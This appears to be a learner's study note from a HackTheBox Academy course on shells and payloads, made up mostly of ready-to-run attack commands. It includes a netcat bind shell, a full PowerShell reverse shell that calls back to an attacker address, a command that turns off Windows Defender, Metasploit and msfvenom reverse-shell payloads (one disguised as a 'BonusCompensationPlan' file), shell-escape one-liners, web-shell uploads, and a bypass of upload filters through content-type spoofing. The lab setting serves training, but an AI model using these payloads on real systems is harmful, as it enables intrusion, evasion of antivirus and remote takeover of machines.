HackTheBox Academy - Shells & Payloads

Updated 29-03-2026
#htb #hackthebox #academy #note

Bind Shells

  • With a bind shell, the target system has a listener started and awaits a connection from the attack system

  • we can use Netcat to establish a bind shell 
    1
    2
    3
    4
    5
    6
    7
    # on server
    # bind a bash shell to the tcp session
    rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f


    # connect to target
    nc -nv 10.129.41.200 7777

Reverse Shells

  • With a reverse shell, the attack box will have a listener running, and the target will need to initiate the connection

  • Reverse Shell Cheat Sheet is one resource that contains a list of different commands, code, and automated reverse shell generators

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # on attack box
    # start listener
    sudo nc -lvnp 443

    # on target (windows)
    powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.60',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

    # disable AV
    Set-MpPreference -DisableRealtimeMonitoring $true

Automating Payloads & Delivery with Metasploit

  • Metasploit is used to exploit vulnerabilities and deliver payloads to gain a shell on a vulnerable system 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    sudo msfconsole

    # search modules associated with smb
    search smb

    # use module
    use 56

    # examine options
    options

    # set options
    set RHOSTS 10.129.180.71

    # run exploit
    exploit

    # drop into system-level shell after getting meterpreter shell
    shell

Crafting Payloads with MSFvenom

  • Staged payloads
    • payloads create a way for us to send over more components of our attack.
    • The payload will send a small stage that will be executed on the target and then call back to the attack box to download the remainder of the payload over the network
    • takes space from memory which leaves less space for the payload
  • Stageless payloads
    • this payload will be sent in its entirety across a network connection without a stage
    • can be beneficial to use in environments where we don’t have good internet
    • they could leave to unstable shell sessions
    • less traffic, better for evasion
  • Stageless payload have the shell payload and network communications all within the same function; Example: /meterpreter_reverse_tcp
  • linux/x86/shell/reverse_tcp is a staged payload, and we can tell from the name since each / in its name represents a stage from the shell forward. So /shell/ is a stage to send, and /reverse_tcp is another 
    1
    2
    3
    4
    5
    6
    7
    8
    # list payloads
    msfvenom -l payloads

    # create stageless payload
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

    # create stageless payload for window
    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe

Windows & Linux Shells

  • Resources
    • MSF is an extremely versatile tool for any pentester’s toolkit. It serves as a way to enumerate hosts, generate payloads, utilize public and custom exploits, and perform post-exploitation actions once on the host. Think of it as a swiss-army knife.
    • Payloads All The Things Here, you can find many different resources and cheat sheets for payload generation and general methodology.
    • Mythic C2 framework is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation.
    • Nishang is a framework collection of Offensive PowerShell implants and scripts. It includes many utilities that can be useful to any pentester.
    • Darkarmour is a tool to generate and utilize obfuscated binaries for use against Windows hosts.
  • On Windows:
    • Use CMD when:
      • You are on an older host that may not include PowerShell.
      • When you only require simple interactions/access to the host.
      • When you plan to use simple batch files, net commands, or MS-DOS native tools.
      • When you believe that execution policies may affect your ability to run scripts or other actions on the host.
    • Use PowerShell when:
      • You are planning to utilize cmdlets or other custom-built scripts.
      • When you wish to interact with .NET objects instead of text output.
      • When being stealthy is of lesser concern.
      • If you are planning to interact with cloud-based services and hosts.
      • If your scripts set and use Aliases.

Spawning Interactive Shells

  • There may be times that we land on a system with a limited shell (sometimes referred to as a jail shells); we can use different methods to spawn an interactive shell

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    /bin/sh -i

    python -c 'import pty;pty.spawn("/bin/bash")'

    perl -e 'exec "/bin/sh";'

    perl: exec "/bin/sh";

    # run from a script
    ruby: exec "/bin/sh"

    # run from a script
    lua: os.execute('/bin/sh')

    awk 'BEGIN {system("/bin/sh")}'

    find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

    find . -exec /bin/sh \; -quit

    vim -c ':!/bin/sh'

    # vim escape
    vim
    :set shell=/bin/sh
    :shell

Web Shells

  • Laudanum is a repository of ready-made files that can be used to inject onto a victim and receive back access via a reverse shell
  • For most of the files within Laudanum, you can copy them as-is
  • For specific files such as the shells, we must edit the file first to insert our attacking host IP 
    1
    2
    3
    4
    5
    # move copy
    cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx

    # then edit the file to add our entries like our ip, etc
    # then we can upload it to vulnerable file upload

Antak Webshell

  • Active Server Page Extended (ASPX) is a file type/extension written for Microsoft’s ASP.NET Framework
  • Antak is a web shell built in ASP.Net included within the Nishang project
  • Antak files can be found in the /usr/share/nishang/Antak-WebShell 
    1
    2
    3
    4
    5
    # mmove copy
    cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspx

    # vim/nano to modify the shell for use
    # then upload

PHP Web Shells

  • Hypertext Preprocessor or PHP is an open-source general-purpose scripting language typically used as part of a web stack that powers a website
  • WhiteWinterWolf’s PHP Web Shell can be used
1
2
3
4
5
6
7
# sometimes file upload only allows certain file types (.png,.jpg,.gif, etc.)
# we can bypass this using BurpeSuite by changing the content-type

# when uploading php where only images is allowed, we can change content type from this
application/x-php
# to this
image/gif